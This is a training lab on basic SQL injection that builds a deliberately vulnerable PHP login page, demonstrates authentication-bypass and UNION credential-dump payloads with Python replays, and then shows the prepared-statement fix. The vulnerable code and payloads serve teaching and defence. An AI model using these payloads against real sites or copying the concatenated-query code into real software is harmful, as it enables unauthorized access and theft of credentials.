Exercise 1: SQL Injection (Basic)

Jan 5, 2025

Objective

Learn to exploit basic SQL Injection vulnerabilities in a login form to understand how attackers can bypass authentication and gain unauthorized access to sensitive data.

Scenario

Imagine you’re performing a security assessment for a small e-commerce website. The website has a simple login form that connects to a backend database to verify user credentials. Due to improper handling of user input, the login form is vulnerable to SQL Injection. Your task is to identify and exploit this vulnerability to bypass authentication.


Lab Setup

Prerequisites:

  • Basic knowledge of HTML, PHP (or any backend language), and SQL.
  • XAMPP/LAMP/WAMP stack installed on your machine (or any web server with PHP and MySQL support).
  • A code editor (e.g., VSCode, Sublime Text).

Step 1: Create the Vulnerable Web Application

Database Setup

Open phpMyAdmin and create a new database:

CREATE DATABASE vulnerable_db;

Use the database:

USE vulnerable_db;

Create a users table:

CREATE TABLE users (
    id INT AUTO_INCREMENT PRIMARY KEY,
    username VARCHAR(50) NOT NULL,
    password VARCHAR(50) NOT NULL
);

Insert sample users:

INSERT INTO users (username, password) VALUES ('admin', 'admin123'); 
INSERT INTO users (username, password) VALUES ('user', 'user123');

PHP Script for Login

Create a file login.php:

<?php
$conn = mysqli_connect("localhost", "root", "", "vulnerable_db");

if (isset($_POST['login'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    // VULNERABLE: user input is concatenated straight into the SQL string,
    // so quotes and keywords in the input become part of the query.
    $query = "SELECT * FROM users WHERE username = '$username' AND password = '$password'";
    $result = mysqli_query($conn, $query);

    // Any non-empty result set counts as a successful login.
    if (mysqli_num_rows($result) > 0) {
        echo "<h2>Login Successful!</h2>";
    } else {
        echo "<h2>Invalid Credentials</h2>";
    }
}
?>

<form method="POST" action="">
    Username: <input type="text" name="username" required><br>
    Password: <input type="password" name="password" required><br>
    <button type="submit" name="login">Login</button>
</form>

Running the Application

Start your Apache and MySQL servers from XAMPP/WAMP/LAMP.

Place the login.php file in the web server’s root directory (htdocs for XAMPP).

Open the browser and navigate to http://localhost/login.php.


Exploitation Steps

Step 1: Testing for SQL Injection

  1. In the Username field, enter: ' OR '1'='1
  2. In the Password field, enter: ' OR '1'='1
  3. Click the Login button.

Expected Result:

The login succeeds even though neither value matches a stored credential.

The SQL query becomes:

SELECT * FROM users WHERE username = '' OR '1'='1' AND password = '' OR '1'='1';

Because AND binds tighter than OR, the WHERE clause is evaluated as username = '' OR ('1'='1' AND password = '') OR '1'='1'. The final '1'='1' is always true, so every row in users is returned, and login.php treats any non-empty result as a successful login. Note that the payload in the Password field is the one doing the work: injecting only the Username field gives username = '' OR ('1'='1' AND password = '...'), which still requires a correct password.

Step 2: Extracting Data

  1. Modify the input to:
    • Username: ' UNION SELECT 1, username, password FROM users -- (followed by a single space)
    • Password: any value. The form marks the field as required, so it cannot be left blank; whatever you type lands inside the SQL comment and is ignored.

The trailing space matters: MySQL treats -- as the start of a comment only when it is followed by whitespace, and login.php appends ' AND password = ... directly after the username. Without the space the statement is a syntax error. The variants -- - and # avoid the problem.

Expected Result:

  • The query becomes SELECT * FROM users WHERE username = '' UNION SELECT 1, username, password FROM users -- ' AND password = '...'. The UNION returns every username and password in the table; the constant 1 fills the id column so that the second SELECT has the same three columns as SELECT *. The result set is non-empty, so the page again reports a successful login.
  • login.php never echoes the rows it fetches, so this lab does not display the extracted data; what the step demonstrates is that an attacker can append an arbitrary SELECT to the developer's query. To see the leaked values, temporarily print the rows returned by mysqli_query, or use the same payload against a page that renders query results.
  • If the column count in the UNION does not match the original SELECT, MySQL rejects the statement. With PHP 8.1 or later mysqli throws an exception by default; on older versions mysqli_query returns false and mysqli_num_rows fails on it. Either way the page errors instead of printing Invalid Credentials, which is itself a sign that the input reached the database unescaped.
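To follow both exploitation steps without a web stack, here is an added Python example (not part of the original lab) that rebuilds the users table in an in-memory SQLite database and assembles the query string exactly as login.php does. The rows are constructed sample data copied from the INSERT statements above; SQLite stands in for MySQL, so the UNION payload ends in -- - rather than a bare --, which is a valid comment start on both engines. The example also shows the operator-precedence point from Step 1 and what the database does when the UNION column count is wrong.

```python
import sqlite3

# Constructed sample rows copied from the tutorial's INSERT statements.
# An in-memory SQLite database stands in for the lab's MySQL vulnerable_db.
SAMPLE_USERS = [("admin", "admin123"), ("user", "user123")]

BYPASS = "' OR '1'='1"
# Step 2 payload. The constant 1 fills the id column so the UNION has the same
# three columns as SELECT *; "-- -" comments out the rest of the statement and,
# unlike a bare "--", is a valid comment start in MySQL as well as SQLite.
UNION_DUMP = "' UNION SELECT 1, username, password FROM users -- -"
UNION_TWO_COLUMNS = "' UNION SELECT username, password FROM users -- -"


def make_db():
    """Create the users table with the tutorial's three columns and seed it."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users ("
        "id INTEGER PRIMARY KEY AUTOINCREMENT, "
        "username TEXT NOT NULL, "
        "password TEXT NOT NULL)"
    )
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_query(username, password):
    """Assemble the statement the way login.php does: raw string interpolation."""
    return f"SELECT * FROM users WHERE username = '{username}' AND password = '{password}'"


def vulnerable_login(conn, username, password):
    """Return every row the (possibly injected) query produces."""
    return conn.execute(build_query(username, password)).fetchall()


def login_succeeds(conn, username, password):
    """Mirror login.php's check: any non-empty result set is a successful login."""
    return len(vulnerable_login(conn, username, password)) > 0


def dump_credentials(conn):
    """Run the UNION payload and return the (username, password) pairs it leaks."""
    rows = vulnerable_login(conn, UNION_DUMP, "anything")
    return sorted((user, pw) for _id, user, pw in rows)


def wrong_column_count(conn):
    """Return the database error raised when the UNION column count does not match."""
    try:
        vulnerable_login(conn, UNION_TWO_COLUMNS, "anything")
    except sqlite3.OperationalError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    db = make_db()
    print(build_query(BYPASS, BYPASS))
    print("both fields injected: ", login_succeeds(db, BYPASS, BYPASS))
    print("username field only:  ", login_succeeds(db, BYPASS, "wrong"))  # AND binds before OR
    print("password field only:  ", login_succeeds(db, "nobody", BYPASS))
    print("leaked credentials:   ", dump_credentials(db))
    print("two-column UNION:     ", wrong_column_count(db))
```

Running it shows the bypass succeeding whenever the Password field carries the payload, failing when only the Username field does, the UNION returning both accounts with the attacker-chosen 1 in the id column, and the two-column UNION being rejected by the engine rather than silently returning no rows.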

Solution and Prevention

Problem Analysis

  • The application concatenates user input directly into the SQL statement, so the database cannot tell the developer's query apart from the attacker's text. Escaping ("sanitizing") the input is fragile; the robust fix is to keep data separate from code.

Fixing the Vulnerability

Use prepared statements (parameterized queries) to mitigate SQL Injection. The statement is sent to the database with placeholders and compiled first; the user's values are bound afterwards and can only ever be compared as data:

<?php
$conn = new mysqli("localhost", "root", "", "vulnerable_db");

if (isset($_POST['login'])) {
    $username = $_POST['username'];
    $password = $_POST['password'];

    // The statement is compiled with placeholders before any user data is seen;
    // the values are bound afterwards and can only be compared as strings.
    $stmt = $conn->prepare("SELECT * FROM users WHERE username = ? AND password = ?");
    $stmt->bind_param("ss", $username, $password);
    $stmt->execute();
    $result = $stmt->get_result();

    if ($result->num_rows > 0) {
        echo "<h2>Login Successful!</h2>";
    } else {
        echo "<h2>Invalid Credentials</h2>";
    }
    $stmt->close();
}
// Note: this lab still stores and compares plaintext passwords. A real application
// stores password_hash() output, looks the row up by username only, and checks the
// submitted password with password_verify().
?>

Testing After Fix

  1. Repeat the same SQL Injection attempts after implementing prepared statements.
  2. Observe that every attempt now returns Invalid Credentials: the payloads are compared as literal username and password strings and match no row.
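Added Python/SQLite example, not from the original lab, showing the parameterized equivalent of the prepared-statement fix and replaying the lab's payloads against it. The sample users are constructed from the INSERT statements above and an in-memory SQLite database stands in for MySQL. The last function creates an account whose username is literally the bypass string, to show that the input is now treated as data and nothing else.

```python
import sqlite3

# Constructed sample rows copied from the tutorial's INSERT statements; an in-memory
# SQLite database stands in for the lab's MySQL vulnerable_db.
SAMPLE_USERS = [("admin", "admin123"), ("user", "user123")]

# The payloads from the exploitation steps above.
BYPASS = "' OR '1'='1"
UNION_DUMP = "' UNION SELECT 1, username, password FROM users -- -"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT NOT NULL, password TEXT NOT NULL)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)", SAMPLE_USERS)
    return conn


def safe_login(conn, username, password):
    """Parameterised equivalent of the prepared statement in the fixed login.php.

    The statement text contains only placeholders. The driver hands the two values
    to the engine separately, after the SQL has been parsed, so quotes, OR and -- in
    the input are just characters of a string being compared, never SQL.
    """
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def replay_attacks(conn):
    """Replay the lab's payloads against the fixed login; every value should be False."""
    return {
        "both fields": safe_login(conn, BYPASS, BYPASS),
        "password field": safe_login(conn, "nobody", BYPASS),
        "union": safe_login(conn, UNION_DUMP, "anything"),
    }


def literal_match(conn):
    """Show the input is treated as data: create an account whose username literally
    is the bypass string; it logs in only with that exact username and its password."""
    conn.execute("INSERT INTO users (username, password) VALUES (?, ?)", (BYPASS, "s3cret"))
    return safe_login(conn, BYPASS, "s3cret"), safe_login(conn, BYPASS, "wrong")


if __name__ == "__main__":
    db = make_db()
    print("valid credentials:", safe_login(db, "admin", "admin123"))
    print("replayed attacks: ", replay_attacks(db))
    print("literal match:    ", literal_match(db))
```

Parameterization closes the injection, but the lab's schema still stores plaintext passwords; in a real application the query would fetch only the stored password_hash() value for the given username and the comparison would be done with password_verify().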

Conclusion

In this lab, you learned how SQL Injection works and how attackers can bypass authentication. You also explored mitigation techniques, such as using prepared statements, to prevent SQL Injection vulnerabilities.

By understanding and practicing this basic form of attack, you gain insight into securing applications against such threats.
